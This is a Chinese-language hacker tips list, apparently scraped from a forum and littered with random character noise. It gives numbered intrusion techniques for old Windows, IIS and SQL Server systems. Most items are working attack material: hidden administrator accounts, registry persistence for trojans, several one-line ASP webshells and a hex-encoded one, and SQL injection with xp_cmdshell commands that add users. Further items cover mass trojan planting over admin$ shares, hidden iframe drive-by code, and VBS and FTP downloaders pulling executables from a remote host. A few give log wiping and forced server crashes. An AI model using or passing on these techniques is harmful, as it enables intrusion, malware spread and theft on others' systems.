1、Xp系统修改权限防止病毒或木马等破坏系统,cmd下,
: d7 O- d$ i/ Y8 L8 q2 U/ ]cacls C:\windows\system32 /G hqw20:R
8 p) h: D1 D, R" J思是给hqw20这个用户只能读取SYSTEM32目录,但不能进行修改或写入
! E, Q: a7 L' P( \; M g+ F恢复方法:C:\>cacls C:\windows\system32 /G hqw20:F
P5 U$ E7 V; X! M) ~) H
* H1 |, l R$ S2 g, C7 V2、用Microsoft自带的IExpress工具作的捆绑木马可以躲过很多杀毒软件,运行对话框中输入Iexpress。
; E( h! y8 @$ f6 W2 r3 s3 q8 x; w) A
3、内网使用灰鸽子,肉鸡上vidcs.exe -p端口,本地VIDCS里,VIDCS服务IP 填肉鸡的IP,VIDCS服务端口,就是给肉鸡开的端口,BINDIP添自己的内网IP,BIND端口 添8000,映射端口添8000。" {# ^6 s( P3 B; V @% x7 Z* R
( ~/ H* ]) `1 G) P& `0 i; V8 @' L3 Q
4、建立隐藏帐号,上次总结了用guest建立隐藏的管理员,这次再介绍一种,在cmd下建立一个ating$的用户,然后注册表下复制管理员的1F4里的F 值到ating$的F值,再把ating$改为$,这样在计算机管理的用户里看不到这个隐藏帐号
7 g! m; T; v3 F( @+ ?7 x
; W8 X; W: A1 }5、利用INF文件来修改注册表
$ U/ F2 g- D8 T) a# `# v7 F[Version]+ @ A, \6 H) [& n. z
Signature="$CHICAGO$"2 Y7 G ~2 k+ y7 E. k n2 v |
[Defaultinstall]
5 P3 P* d l E( H6 n0 XaddREG=Ating
$ N# ], [. D4 K* Z+ e! `[Ating]
% t W( o" v6 Q% U# T/ C$ IHKCU,"Software\Microsoft\Windows\CurrentVersion\Policies\system","disableregistrytools","0x00010001","1"* @. g! ]' L5 Z* s
以上代码保存为inf格式,注意没有换行符,在命令行里导入inf的命令如下:0 Z' X U9 A, D/ B8 x, g
rundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 inf文件的具体路径
2 B7 z9 e( f2 d& [" t9 D其中HKEY_CLASSES_ROOT 简写为 HKCR,HKEY_CURRENT_USER 简写为 HKCU
; N X- f# x) F- n+ fHKEY_LOCAL_MACHINE 简写为 HKLM,HKEY_USERS 简写为 HKU6 ^+ A' r5 p: ]8 [
HKEY_CURRENT_CONFIG 简写为 HKCC
% T" e7 Q" k1 @1 i$ l4 G6 x0x00000000 代表的是 字符串值,0x00010001 代表的是 DWORD值
4 f S' u" g& i2 L"1"这里代表是写入或删除注册表键值中的具体数据5 Y X% ~8 y7 I+ ?; V# p
" X3 V/ J5 S0 c
6、关于制作穿xp2防火墙的radmin,大家一定要会,各大黑客网站都有动画, J$ u& R& n F2 r3 f! ~8 |
多了一步就是在防火墙里添加个端口,然后导出其键值" t* U: f( L0 t
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List]
% C# B- V. T6 P, q
. ^$ \5 j" h/ z( a' x7、系统启动时Alerter服务启动前启动木马程序ating.exe,此方法很隐蔽
1 Q% [5 l# L; q3 i) M, k在[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CurrentVersion\Image File Execution Options]下建立service.exe项,再在service.exe项建立一个Debugger的键(字符串值),键值填ating.exe的全路径。+ X8 W9 E+ t- p2 ^
$ m5 P& a8 w$ {/ c b8、将ftp.exe传到服务器用来提权,可以先把它变成ating.gif格式的再用,迷惑管理员。
8 K, \) D" d' A+ O: ?
4 h6 z9 z5 P0 j9、有时候在我们进入了网站后台,但是没有上传图片和备份等功能,得不到webshell,# z9 l f( N2 b; t
可是不能白来一场,可以看看发表公告或新闻支不支持html和script,支持的话加个frame马或者其他的什么。. M' ^" j! M% p R; S" S
. S5 h2 o7 d2 n3 J, ^. N10、用google帮我们找网站后台,搜索”filetype:asp site:www.hack6.com inurl:login”
7 d9 i3 F$ u" |0 |0 G' k
2 w! Q% Z3 u5 u7 K; ~, v1 t11、我们中了盗密码的木马后不要急于删除,一般这些木马都是把密码发到指定邮箱,我们可以用探嗅软件来找到邮箱的用户名和密码,比如安全焦点的xsniff,
' P4 k# t! g$ f& w+ x- f$ T- N用法:xsniff –pass –hide –log pass.txt
, f1 ^$ m2 l: d& f/ F# @1 \) V
" N1 T5 u. c. \ e" \1 A7 D: j12、google搜索的艺术
% m2 P; p% t. c搜索关键字:“未闭合的引号”或“ADODB.Field.error”或“Either BOF or EOF in True”4 _# g c% l& E3 e. q7 a
或“字符串的语法错误”可以找到很多sql注入漏洞。
5 X3 g9 A% j u
) Q* D. q. F: c- X2 I13、还可以搜一些木马的关键字,比如搜索“管理登陆 海洋顶端 inurl:asp”,搜到了说明此网站服务器的其中网站肯定有漏洞。
- E9 {9 {) ?* m; f* G1 O. w; X8 a& |, ?, |: J
14、cmd中输入 nc –vv –l –p 1987
* l7 D# w }+ B, a n1 x2 b做个bat文件内容为sqlhello 起始ip 1433 终止ip 1987 扫鸡吃
4 u' K6 p `4 n: e8 Y& u" j& U( u; B% i+ D
15、制作T++木马,先写个ating.hta文件,内容为; j0 g: g$ X4 a5 Y: r) `7 q
<script language="VBScript">+ T1 G/ |+ V8 `* w- ?
set wshshell=createobject ("wscript.shell" )+ r/ P: W" \% Z
a=wshshell.run("你马的名称",1)
' o T2 t6 A5 @* [window.close
0 p8 J5 _ K Y- o2 l- k& _. v! v</script>, E- }- Y( Z( P( ~) Q% W/ o" ^& s
再用mshta生成T++木马,命令为mshta ating.hta ating.t++,用网页木马生成器生成网页木马。
* L' e1 }8 Z- @7 k) ~
: J( \: q8 m' s$ f" C7 P16、搜索栏里输入' [: |: ]( d( b- @% x0 W
关键字%'and 1=1 and '%'=', z, |8 G8 i3 a9 [
关键字%'and 1=2 and '%'='. O& p( [. V2 n/ C$ v' G
比较不同处 可以作为注入的特征字符
/ e- C) Q( l3 V8 O& i) \
, n O4 E2 x7 s6 W( r5 H17、挂马代码<html>3 _( H9 [- k4 f1 c
<iframe src="马的地址" width="0" height="0" frameborder="0"></iframe>
7 A/ y# v; v) P5 c: ]& R</html>$ b$ ?, T: g: h* @( Q
. S) N1 N$ q) Q# m* K18、开启regedt32的SAM的管理员权限检查HKEY_LOCAL_MACHINE\SAM\SAM\和HKEY_LOCAL_MACHINE\SAM\SAM\下的管理员和guest的F键值,如果一样就是用被入侵过了,然后删了guest帐号,对方可以用guest帐号使用administraeors的权限,你也可以用这方法留住肉鸡, 这方法是简单克隆,. r; E. ^0 ^; V2 u: z/ n* ~
net localgroup administrators还是可以看出Guest是管理员来。0 U% v7 ^6 G5 U' }& T/ }- b. D
+ ?3 b/ e, L% ~19、软件instsrv.exe 把.exe文件做成系统服务来启动 用来肉鸡挂QQ等# ?% d5 e# ~2 f# Q! ?
用法: 安装: instsrv.exe 服务名称 路径
3 ~$ ?+ |5 R7 h卸载: instsrv.exe 服务名称 REMOVE
/ Z L. R9 Y2 e; j! y9 I; K% D) @7 l$ O: s3 r2 t) |
* @- u- c5 B1 Y J21、SQL注入时工具---Internet选项---高级里找到显示友好的错误信息勾去掉, b% U( @. k" K* B9 W- b
不能注入时要第一时间想到%5c暴库。
+ G7 S" Y/ z" ^# y, [) X! ?6 X0 d
4 t4 A( e' R( P/ N3 h22、很多网站程序(比如华硕中文官方网站)上传图片时有可能在检测文件的时候是 从左朝又进行检测,也就是说,他会检测文件是不是有.jpg,那么我们要是把文件改成:ating.jpg.asp试试。。由于还是ASP结尾,所以木马不会变~
( ^2 [7 Y) e. ~* h7 T' E& R& n( t* o, ^, E6 ~" w6 }
23、缺少xp_cmdshell时
' V! Y6 H. f; W' T, K尝试恢复EXEC sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'
' x% j* X1 o& [1 \/ C* @; X, [假如恢复不成功,可以尝试直接加用户(针对开3389的)
" y Y: d6 y+ o6 r& d" `3 J; X+ Ddeclare @o int. U2 ]+ D9 c2 [: c9 X
exec sp_oacreate 'wscript.shell',@o out
/ P$ _& R* D# r2 g! Z1 }exec sp_oamethod @o,'run',NULL,'cmd.exe /c net user ating ating /add' 再提到管理员- t$ q6 C: b* V( M Y
y$ ]) n- L' Y7 R- B24.批量种植木马.bat
. F1 g. x0 v( X4 v7 F( H4 Cfor /f %%i in (扫描地址.txt) do copy pc.exe %%i\admin$ 复制木马到扫描的计算机当中1 P" D, G# p$ |4 ]4 d T
for /f %%i in (扫描地址.txt) do at %%i 09:50 pc.exe 在对方计算机上运行木马的时间% I1 Z* A/ `1 n7 w0 t1 j l
扫描地址.txt里每个主机名一行 用\\开头( ]7 ]- ?3 X4 m \8 L p& S
5 b8 b8 L" B2 c0 |2 s4 Q3 }& S: ~25、在程序上传shell过程中,程序不允许包含<% %>标记符号的内容的文件上传,比如蓝屏最小 的asp木马<%execute request("l")%>,我们来把他的标签换一下: <script language=VBScript runat=server>execute request("l")</Script> 保存为.asp,程序照样执行。1 X# I- j/ q; z8 s9 ]
" V; t: f% @6 ?+ F4 X" w3 \: p! u26、IIS6 For Windows 2003 Enterprise Edition 如IIS发布目录文件夹包含.asp后辍名.( U+ ~6 `' w8 r! C4 y! L8 D( k
将.asp后辍改为.jpg或其它的如.htm,也可以运行asp,但要在.asp文件夹下.8 U' p5 X, \& Y* a6 g I+ d
.cer 等后缀的文件夹下都可以运行任何后缀的asp木马- H: d; p6 o6 B& b4 ~8 k4 V# Y
8 \, z" D# o& e. I+ v27、telnet一台交换机 然后在telnet控制主机 控制主机留下的是交换机的IP# x& B/ ` I0 L! F7 z& g0 @. e$ t
然后用#clear logg和#clear line vty *删除日志 O b" M: D) _! c
. A+ Z1 h X$ K" \$ c$ ?* e28、电脑坏了省去重新安装系统的方法! @& P& s- ?. F" V8 s! a3 [* T
纯dos下执行,
1 Q+ s0 d$ n, H# wxp:copy C:\WINDOWS\repair\*.* 到 c:\windows\system32\config
2 {1 S6 I' J! @" h+ c2k: copy C:\winnt\repair\*.* 到 c:\winnt\system32\config' y9 [+ u+ L9 Q9 i" C
/ s2 Z% G# `& e2 j/ i29、解决TCP/IP筛选 在注册表里有三处,分别是:
7 ~+ ]- Z1 f3 o) {! W& x" H0 J7 kHKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip
0 Q) T3 B, J) j% h* T. eHKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip6 w" s7 m, r" L
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip
3 P& _6 K# p6 A& y" e" _+ z分别用
! o8 a) j, i# [( uregedit -e D:\a.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip
$ r' j& c$ Y# R. q' c' ~" M4 vregedit -e D:\b.reg HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip
. e4 o% o8 S% f7 Yregedit -e D:\c.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip
8 y+ l5 z7 \" u ]8 P命令来导出注册表项
' ?, B+ X% N t6 e" W+ N然后把三个文件里的EnableSecurityFilters"=dword:00000001,
; D. U* {8 ~- y/ _: _' I7 ]" o改成EnableSecurityFilters"=dword:00000000 再将以上三个文件分别用
% R4 s* ~1 i2 vregedit -s D:\a.reg regedit -s D:\b.reg regedit -s D:\c.reg 导入注册表即可。! `4 y- J# ]- a1 F/ B' {0 W
$ T9 f$ W$ h: T* ?: M
30、使CHM木马无法在本地运行木马程序 将注册表"HKEY_CURRENT_U
6 [+ V- p2 n K( x; Z/ r% eSER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0"下的1004项的值由原来十进制的0改为十六进制的35 T; Z* }% E6 b2 C# Y9 _$ c1 j' t
* K6 g6 W& w2 X
31、全手工打造开3389工具7 f$ J. r. C2 k e- y; @
打开记事本,编辑内容如下:
( Z- h* A9 C- L- c5 Y" I+ zecho [Components] > c:\sql, o: k, m \1 u' q$ o
echo TSEnable = on >> c:\sql
' e' b4 I1 D6 o* H1 S5 x. ~3 Esysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\sql /q4 V/ ~% @( I0 f0 S* x' r
编辑好后存为BAT文件,上传至肉鸡,执行
% I' K% U( f) c$ W( I
0 Z2 b& w% S- Q32、挂马js代码document.write('<iframe height=0 width=0 src="木马地址.htm"></iframe>');保存到js页面里 可让所有页面挂马2 z. K$ r; L U2 {7 ^
; `" P7 L; I' Z* ^4 c. @. Y33、让服务器重启
6 F1 D+ [. a: G3 D4 ], d写个bat死循环:
( i$ s- m I/ D5 X8 ~7 ^( d@echo off) l; U% K1 p/ O* y. o- x
:loop1
4 A; y. z1 |3 m" m$ u8 fcls
p! a" e F, ~. C' Pstart cmd.exe8 x$ G, q' a$ Z4 t5 b" y
goto loop18 w4 |/ P s. V: ~1 E$ q4 r
保存成bat guset权限就可以运行 运行后很快服务器就会死机 管理员自然会去重启
: S- V% [' E1 z( |& Y$ a
* X c0 h* ?% `0 e" F9 V! Z$ v/ ~2 S34、如果你登录肉鸡的3389时发现有cmd一闪而过,那你可要小心了,管理员写了个bat在监视你,
. a: r; x8 B$ G' \, N! {@echo off
) a/ N0 M& {2 L- C& z2 q1 Sdate /t >c:/3389.txt0 h5 Z$ t6 B' L# P: _
time /t >>c:/3389.txt! T* P# c: [7 j' `
attrib +s +h c:/3389.bat1 W; t- B% C9 W! Y
attrib +s +h c:/3389.txt
1 q5 e+ x# k3 V ^& r/ p$ Anetstat -an |find "ESTABLISHED" |find ":3389" >>c:/3389.txt3 M' t9 m/ v: [, G
并保存为3389.bat. R( [+ U. @+ |3 i% a. T# _
打开注册表找到:Userinit这个键值 在末尾加入3389.bat所在的位置,比如我放到C盘,就写:,c:/3389.bat,注意一定要加个逗号
4 w$ w* u( J* [9 L. h% i
( ?( A. N& K3 F8 k l$ [6 L35、有时候提不了权限的话,试试这个命令,在命令行里输入:
/ Q+ M9 O" d1 |2 Astart http://www.hack520.org/muma.htm然后点执行。(muma.htm是你上传好的漏洞网页)
: U# t: V" ]% \: A `+ i输入:netstat -an | find "28876" 看看是否成功绑定,如果有就telnet上去,就有了system权限,当然也可以nc连接,本地执行命令。
/ }8 T# x4 p: l% } ]# @2 ^* |: e4 R- u5 l
36、在cmd下用ftp上传马方法,我们可以用echo 写一个批处理文件
3 i! C4 w& u# oecho open 你的FTP空间地址 >c:\1.bat //输入你的FTP地址( V0 A# j. p* H
echo 你的FTP账号 >>c:\1.bat //输入账号: Y5 }/ o' ?+ c; K0 k* ~
echo 你的FTP密码 >>c:\1.bat //输入密码
( {2 |- X. T2 [echo bin >>c:\1.bat //登入
" ~0 f# [( n3 c' F$ ]$ techo get 你的木马名 c:\ ating.exe >>c:\1.bat //下载某文件到某地方并改名为什么7 i9 v2 M2 T" ?' i) {" V
echo bye >>c:\1.bat //退出7 Z$ u) T- }% m% q% L
然后执行ftp -s:c:\1.bat即可
4 N! j& T/ K: b" O e7 G2 _5 s6 D* }- D8 d+ l6 C( q
37、修改注册表开3389两法
+ s+ `) l, v s(1)win2000下开终端 首先用ECHO写一个3389.reg文件,然后导入到注册表
0 u% _( t. o* a' \4 N' q7 [5 [9 o0 hecho Windows Registry Editor Version 5.00 >>3389.reg
$ q) t- t* H1 z. Becho [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >>3389.reg
8 U8 N1 M+ K" |8 L& K2 Zecho "Enabled"="0" >>3389.reg
; N7 p# B0 d$ ~/ fecho [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
. n) L* `% R9 M* rNT\CurrentVersion\Winlogon] >>3389.reg C4 w8 `% h3 B, T: N) q0 x# X
echo "ShutdownWithoutLogon"="0" >>3389.reg) M9 m1 Y$ x7 ~. Y
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer]
% j) C5 g0 ?0 m4 N2 T4 e3 I! u5 {>>3389.reg
- B7 [, C4 [. l, \, wecho "EnableAdminTSRemote"=dword:00000001 >>3389.reg
3 L! n% N8 P4 D, a; Uecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]9 J/ P' ]- l6 `% y, Y4 q
>>3389.reg. d: `& j3 m7 _2 m0 G
echo "TSEnabled"=dword:00000001 >>3389.reg
" B# A3 L- t: ]8 c) zecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>3389.reg
8 R$ e( U* e# y9 |( aecho "Start"=dword:00000002 >>3389.reg
- |, G' y8 J3 S- W) G6 \echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService]
9 ~5 S* u* P% k B" i>>3389.reg
" g" _5 ~; \/ Z3 }echo "Start"=dword:00000002 >>3389.reg; U( A* E# h) Q M
echo [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] >>3389.reg/ {! q4 |' T& o6 _! y" d
echo "Hotkey"="1" >>3389.reg
" V2 I2 G; i0 i& r6 _8 zecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal0 a- E! y2 Q8 }; v. S4 z
Server\Wds\rdpwd\Tds\tcp] >>3389.reg6 T( ?( s8 i* R4 L- F( u
echo "PortNumber"=dword:00000D3D >>3389.reg
, Q5 g- [9 q* \# E% \! ^echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal) q9 c* r9 \5 n- g# h! K
Server\WinStations\RDP-Tcp] >>3389.reg
" U' ]1 q9 w$ v1 Y* m7 b* ~7 a$ }echo "PortNumber"=dword:00000D3D >>3389.reg
; Z. |' [9 d+ X. }6 Y把这些ECHO代码到CMDSHELL下贴粘就可以生成3389.reg文件,接着regedit /s 3389.reg导入注册表。
' U( M& b' Y, |% ?& x(如果要改变终端端口只须把上面的两个D3D都改一下就可以了)
, W0 {. ^8 i* E因为win 2k下开终端不能像XP一样可以立即生效,而是需重启机器后才生效
2 u+ d2 _3 C* g3 k9 c$ Z(2)winxp和win2003终端开启; V9 m6 U, z3 o0 T" _
用以下ECHO代码写一个REG文件:
! k9 B2 ~& b' z6 A) b1 t9 Zecho Windows Registry Editor Version 5.00>>3389.reg
( T. z: C3 n5 A0 i9 x& s) I' oecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal6 p6 N, e; r: M
Server]>>3389.reg' E# |7 l. m; S4 _
echo "fDenyTSConnections"=dword:00000000>>3389.reg$ |' `, M/ s; a. L
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal5 L; T( k& e/ P/ P) N3 v
Server\Wds\rdpwd\Tds\tcp]>>3389.reg
* X k: E* O% T0 V" I0 v7 Aecho "PortNumber"=dword:00000d3d>>3389.reg
3 h- k. E$ e: q& K, a. ~echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
4 j# z* ]0 l3 |- {# G V! YServer\WinStations\RDP-Tcp]>>3389.reg% T, ]0 n0 `$ u ^2 a
echo "PortNumber"=dword:00000d3d>>3389.reg
% f8 o6 O2 K- J. |然后regedit /s 3389.reg del 3389.reg% X# k! Y$ c9 o9 J! l
XP下不论开终端还是改终端端口都不需重启
0 X( n3 I4 V8 S7 n0 c2 m3 ^3 ~8 U4 D( C3 A
38、找到SA密码为空的肉鸡一定要第一时间改SA密码,防止别人和我们抢肉吃) G, p' _- Q/ b% D- [+ }+ k n" x
用查询分析器运行 EXEC sp_password NULL, '你要改的密码', 'sa'" Y3 r7 M/ W6 M4 }* @% E' J
- P+ A. O# \' B39、加强数据库安全 先要声明把mdb改成asp是不能防止下载的!
* o- F: s) Q8 D(1)数据库文件名应复杂并要有特殊字符
3 K& t* N/ n$ V6 [8 e& u(2)不要把数据库名称写在conn.asp里,要用ODBC数据源! E( i2 Y5 V5 S2 ?2 e6 F7 ]4 i
将conn.asp文档中的
1 B' I$ i2 Y, ]DBPath = Server.MapPath("数据库.mdb")
7 |7 T+ }; f7 y4 M4 m$ Aconn.Open "driver={Microsoft Access Driver (*.mdb)};dbq=" & DBPath) \: }1 J& M& D( |
$ G! X: J s3 f- P+ o修改为:conn.open "ODBC数据源名称," 然后指定数据库文件的位置( B( a8 ?7 b5 c2 v- |
(3)不放在WEB目录里
1 X! `, m h: U* d4 O9 I, T- z' s/ `8 y$ r
40、登陆终端后有两个东东很危险,query.exe和tsadmin.exe要Kill掉& @+ z, ~7 _9 |3 F8 z- ?
可以写两个bat文件
9 y$ m2 R7 s9 J) F@echo off
" h" ^; f7 b) {; X8 I v9 s+ O@copy c:\winnt\system32\query.exe c:\winnt\system32\com\1\que.exe( ~7 @. C9 H- C; R( G V
@del c:\winnt\system32\query.exe
* {3 B% d" z# t$ d; t@del %SYSTEMROOT%\system32\dllcache\query.exe
! V( j5 g) ?+ L" D& p@copy c:\winnt\system32\com\1\query.exe c:\winnt\system32\query.exe //复制一个假的) n( \2 _0 k7 ]& G
3 q2 ]" K2 {) w
@echo off4 m( p( O, r6 V H
@copy c:\winnt\system32\tsadmin.exe c:\winnt\system32\com\1\tsadmin.exe) g0 I" R: t/ \ K
@del c:\winnt\system32\tsadmin.exe2 j' l% V: ?4 W4 m# F; {7 g
@del %SYSTEMROOT%\system32\dllcache\tsadmin.ex0 u" d2 Z% C5 I# f. _8 |
, s- c9 c( U0 ]# `% d
41、映射对方盘符
8 G" ]9 ^1 [3 Y Wtelnet到他的机器上,
2 o5 U a- Y. V# p9 a! ?/ T) vnet share 查看有没有默认共享 如果没有,那么就接着运行
' b. B) I4 G; _- c' e3 wnet share c$=c:" f2 s; z: Z8 N; \# v8 ?) }; R
net share现在有c$
' O, m W& _' e" G* c# X* f" J% C0 [在自己的机器上运行& e/ R9 A& ^% C, f; r! V% g
net use k: \\*.*.*.*\c$ 把目标共享映射到本地硬盘,盘符为K
1 H; I9 d# K6 [2 M$ h+ Q- S( T
42、一些很有用的老知识
) f k( ]9 f5 ?% n/ }0 N) t4 Gtype c:\boot.ini ( 查看系统版本 ); c8 r; m. T/ V' c: A I/ r: Y& _
net start (查看已经启动的服务)4 C" {9 a) J2 T& _; V6 M
query user ( 查看当前终端连接 )
E4 n# ~( H( N, ~net user ( 查看当前用户 )
; ?% `( |! F+ u2 [net user 用户 密码/add ( 建立账号 )! V8 ]. q* I" n/ J" }$ b+ m+ K: d
net localgroup administrators 用户 /add (提升某用户为管理员)# [' K5 Z( X. T) F
ipconfig -all ( 查看IP什么的 )
) e; Y2 b% ^, }" C% Q$ a! hnetstat -an ( 查看当前网络状态 )
: N+ c5 T3 O, T# ffindpass 计算机名 管理员名 winlogon的pid (拿到管理员密码)! R! v! z7 b4 z- v
克隆时Administrator对应1F47 F! B& R8 O; i+ Z$ j$ R
guest对应1F56 K+ ]& p7 @+ `3 I# v% z
tsinternetuser对应3E8
3 D* Y1 E$ i) f9 W: r% K2 w6 [* E5 k
43、如果对方没开3389,但是装了Remote Administrator Service
7 Q% t/ l' x$ [2 _% n8 n用这个命令F:\ftp.exe "regedit -s F:\longyi.biz\RAdmin.reg" 连接1 W r5 K# R, X5 {
解释:用serv-u漏洞导入自己配制好的radmin的注册表信息
- \* E" j6 B' y# j- C0 o先备份对方的F:\ftp.exe "regedit -e F:\1.reg HKEY_LOCAL_MACHINE\SYSTEM\RAdmin"
* t2 K" J0 B( G/ q, C4 _; o- ~
' m9 X" s( l, J+ i* Z44、用lcx做内网端口映射,先在肉鸡上监听 lcx -listen 52 8089 (端口自定)
0 t& @4 \. ^, v' q本地上运行映射,lcx -slave 鸡的ip 52 我内网的ip 80 (我的WEB是80端口)
P- n- Y# m% z+ n! N
2 d; B- o, e' d/ x45、在服务器写入vbs脚本下载指定文件(比如用nbsi利用注入漏洞写入)- o, m' U5 x7 j4 v" ]6 c
echo Set x= CreateObject(^"Microsoft.XMLHTTP^"):x.Open3 l+ q4 m! d* a1 y, u
^"GET^",LCase(WScript.Arguments(0)),0:x.Send():Set s =
" d% D9 Z/ @1 ^CreateObject(^"ADODB.Stream^"):s.Mode = 3:s.Type =
0 n: ^. z$ D1 p5 @ [# |. |1:s.Open():s.Write(x.responseBody):s.SaveToFile LCase(WScript.Arguments(1)),2 >ating.vbs
( I! W2 \* \% L3 o(这是完整的一句话,其中没有换行符)
! x# z( i1 a; j8 I5 @+ J3 g然后下载:* h7 s7 I$ `6 B' ~
cscript down.vbs http://www.hack520.org/hack.exe hack.exe8 }# s5 p" ^4 z) T- p/ P
% T% @/ \4 z0 q g5 B/ X% A46、一句话木马成功依赖于两个条件:
- ^) J% L. W. p! s0 e! O+ g1、服务端没有禁止adodb.Stream或FSO组件: z% o2 c+ f" x P' D/ ?2 |- e
2、权限问题:如果当前的虚拟目录禁止user级或everyone写入的话也是不会成功的。) j4 n! T. t% f+ N" r2 j5 {( g; }
& p1 ]8 g$ K7 b/ e47、利用DB_OWNER权限进行手工备份一句话木马的代码:: p5 P8 M5 P( \1 h. Y
;alter database utsz set RECOVERY FULL--
7 W5 C6 |) Z. E% n3 U;create table cmd (a image)--
. |$ |2 N) G2 f5 P;backup log utsz to disk = 'D:\cmd' with init--
: A" G: n3 S: s" h z( X;insert into cmd (a) values (0x3C25657865637574652872657175657374282261222929253EDA)--
' t$ f2 D: x( \( ]1 k;backup log utsz to disk = 'D:\utsz_web\utsz\hacker.asp'--: f9 f |1 N' O8 O, E# }% d) Z
注:0x3C25657865637574652872657175657374282261222929253EDA为一句话木马的16进制形式。# ]9 s0 |! h1 L, Q* Y
) l1 i& F% m2 q' E48、tlntadmn是telnet服务的设置命令,可以对telnet服务的端口、认证方式等进行设置:
/ y3 H9 g: T; C1 F
& m# b+ F- Z# H9 \- Y. X! }用法: tlntadmn [computer name] [common_options] start | stop | pause | continue | -s | -k | -m | config config_options
. i. O- C W% y- _! e1 H+ o3 [9 U所有会话用 'all'。* r, O( @6 i1 s5 h5 y5 p
-s sessionid 列出会话的信息。
' w7 K) N: E1 @" }1 J o-k sessionid 终止会话。7 J3 a. c: [6 E+ b w
-m sessionid 发送消息到会话。" [5 z/ R5 O8 O: ?* P
3 H0 G* K2 v9 zconfig 配置 telnet 服务器参数。
' e5 P$ q& ~. t. h+ u; t ^
" Y' ]* k" F. n |# Gcommon_options 为:
+ x! Z/ `* L* t' K) m3 j-u user 指定要使用其凭据的用户" \- j; L! Q" Q9 j
-p password 用户密码# y4 j6 ]& } ]6 }
% {% H# Z3 B) N. r2 n1 z; G! R' Z3 bconfig_options 为:
9 Q& _4 m; E( Sdom = domain 设定用户的默认域
0 V4 C7 p& K. e8 `& D- ectrlakeymap = yes|no 设定 ALT 键的映射
7 X. @$ Q. k' V# R8 jtimeout = hh:mm:ss 设定空闲会话超时值
; X# J2 \- c1 t3 ^ Htimeoutactive = yes|no 启用空闲会话。
6 P4 t' n4 i; M1 hmaxfail = attempts 设定断开前失败的登录企图数。
: n8 s$ V- ^% _1 _, M; ^3 mmaxconn = connections 设定最大连接数。* L9 o9 ?0 Y/ T3 S6 i9 r! R k
port = number 设定 telnet 端口。 E- T; x$ r" |; R( U
sec = [+/-]NTLM [+/-]passwd6 |5 o/ e4 S v/ v7 `' C0 ?
设定身份验证机构
" Z( x+ x$ M# a0 Sfname = file 指定审计文件名。
, a; n ~( y+ n. W# ?/ J3 o: a5 efsize = size 指定审计文件的最大尺寸(MB)。4 O/ d5 u. r& }2 `6 b
mode = console|stream 指定操作模式。# u/ A# W+ h) v5 s; A
auditlocation = eventlog|file|both: }4 R' T' N. B8 s- X+ g* e/ _5 k
指定记录地点# d! Y& X0 s& S1 ?! c
audit = [+/-]user [+/-]fail [+/-]admin
" X. \2 P! b% a$ ]3 [! d: P7 \4 J/ N9 i; Y8 ?$ n) I" T
49、例如:在IE上访问:# C, k I! R7 [% T$ b K
www.hack520.org/hack.txt就会跳转到http://www.hack520.org/
, c+ r- C* h! e4 F( Uhack.txt里面的代码是:
. }$ k% p1 c% k; Z<body> <META HTTP-EQUIV="Refresh" CONTENT="5;URL=http://www.hack520.org/">4 O2 n* J) A. X1 I
把这个hack.txt发到你空间就可以了!, P, }! A: y( P& E; r
这个可以利用来做网马哦!
4 ~! ^+ w y6 N6 U3 g/ @2 C5 f. l" S) y& N. s6 U4 h: G
50、autorun的病毒可以通过手动限制!4 v5 R$ R5 K7 }7 H! T
1,养成好习惯,插入U盘或移动硬盘,都要按住shift让其禁止自动运行!* r8 u: M- k; h3 S1 F4 q
2,打开盘符用右键打开!切忌双击盘符~
0 J% N7 G1 v* O( S2 D. p0 a, X3,可以利用rar软件查看根目录下autorun病毒并删除之!他可以处理一些连右键都无法打开的分区!
! I% G# R# x% j( m( d' O6 [: ~
, O/ \9 N0 C9 [' I; W8 d, w& d) d51、log备份时的一句话木马:
& U* ^: ]/ N8 d! c3 Ra).<%%25Execute(request("go"))%%25>
2 q- f0 x/ n0 a- O7 [( i$ Q) g1 pb).<%Execute(request("go"))%>
! Y7 e1 L1 S1 Z! }c).%><%execute request("go")%><%
+ E0 M6 r* e8 ?9 P% _' q8 md).<script language=VBScript runat=server>execute request("sb")</Script>
- F$ ~8 u: ?6 J8 ee).<%25Execute(request("l"))%25>
2 X `/ ?9 v- v/ O* Cf).<%if request("cmd")<>"" then execute request("pass")%>
+ z2 }- ?! h, L) v6 w, J+ R, l9 Q2 F* z! s7 n7 o
52、at "12:17" /interactive cmd1 c C4 S- X/ P$ }# e3 I3 F
执行后可以用AT命令查看新加的任务
( l- {. I% z3 O用AT这个命令以交互的方式运行cmd.exe 这样运行的cmd.exe是system权限。, N, t, j) h* T0 r+ _- T( {; e% z+ h
5 E) b, A# s. ]2 R Q3 p
53、隐藏ASP后门的两种方法4 E% W% ~$ U: X5 K6 r
1、建立非标准目录:mkdir images..\
